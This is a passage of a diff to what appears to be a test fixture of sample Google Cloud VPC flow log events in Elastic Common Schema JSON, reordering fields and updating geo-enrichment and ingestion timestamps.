@@ -24787,6 +25998,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415302932Z", + "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:50.733935895Z", + "end": "2019-06-14T03:49:50.856250208Z", + "id": "14iipwlfd8t01i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24798,19 +26019,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 123 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -24821,38 +26053,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392560400Z", - "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:50.733935895Z", - "end": "2019-06-14T03:49:50.856250208Z", - "id": "14iipwlfd8t01i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65272, 
@@ -24866,6 +26080,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415303337Z", + "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403442252Z", + "end": "2019-06-14T03:49:56.316981133Z", + "id": "14iipwlfd8t01k", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -24877,25 +26101,24 @@ "iana_number": "6", "packets": 618, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 123 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -24906,23 +26129,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 115 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392564500Z", - "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403442252Z", - "end": "2019-06-14T03:49:56.316981133Z", - "id": "14iipwlfd8t01k", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, 
@@ -24931,13 +26145,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65273, @@ -24945,6 +26162,16 @@ "ip": "67.43.156.13", "packets": 710 }, + "event": { + "ingested": "2021-12-14T14:43:27.415303753Z", + "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378287Z", + "end": "2019-06-14T03:49:56.316930467Z", + "id": "14iipwlfd8t01f", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -24956,19 +26183,30 @@ "iana_number": "6", "packets": 710, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.73.186.17", + "192.168.2.73" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 242 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -24979,29 +26217,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 115 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392567800Z", - "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378287Z", - "end": "2019-06-14T03:49:56.316930467Z", - "id": "14iipwlfd8t01f", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", 
@@ -25024,6 +26241,16 @@ "domain": "infraops-docker-data", "ip": "10.73.186.17" }, + "event": { + "ingested": "2021-12-14T14:43:27.415304141Z", + "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.168.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:23.705320616Z", + "end": "2019-06-14T03:44:23.955039461Z", + "id": "14iipwlfd8t018", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25035,25 +26262,24 @@ "iana_number": "6", "packets": 13, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.73.186.17", - "192.168.2.73" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 242 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25064,23 +26290,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 37 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392572200Z", - "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.168.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:23.705320616Z", - "end": "2019-06-14T03:44:23.955039461Z", - "id": "14iipwlfd8t018", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -25089,11 +26306,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 56410, @@ -25101,6 +26323,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415304526Z", + "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:10.514594429Z", + "end": "2019-06-14T03:47:10.630345069Z", + "id": "14iipwlfd8t01a", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25112,19 +26344,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 95 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25135,38 +26378,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 37 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392577900Z", - "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:10.514594429Z", - "end": "2019-06-14T03:47:10.630345069Z", - "id": "14iipwlfd8t01a", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65277, 
@@ -25180,6 +26405,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415304923Z", + "original": "{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760385211Z", + "end": "2019-06-14T03:49:56.316890309Z", + "id": "14iipwlfd8t017", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25191,25 +26426,24 @@ "iana_number": "6", "packets": 615, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 95 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25220,23 +26454,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 123 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392583600Z", - "original": "{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760385211Z", - "end": "2019-06-14T03:49:56.316890309Z", - "id": "14iipwlfd8t017", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, 
@@ -25245,13 +26470,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65272, @@ -25259,6 +26487,16 @@ "ip": "67.43.156.13", "packets": 745 }, + "event": { + "ingested": "2021-12-14T14:43:27.415305671Z", + "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403442252Z", + "end": "2019-06-14T03:49:56.316981133Z", + "id": "14iipwlfd8t01m", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25270,19 +26508,30 @@ "iana_number": "6", "packets": 745, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25293,36 +26542,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 123 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392589100Z", - "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403442252Z", - "end": "2019-06-14T03:49:56.316981133Z", - "id": "14iipwlfd8t01m", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + 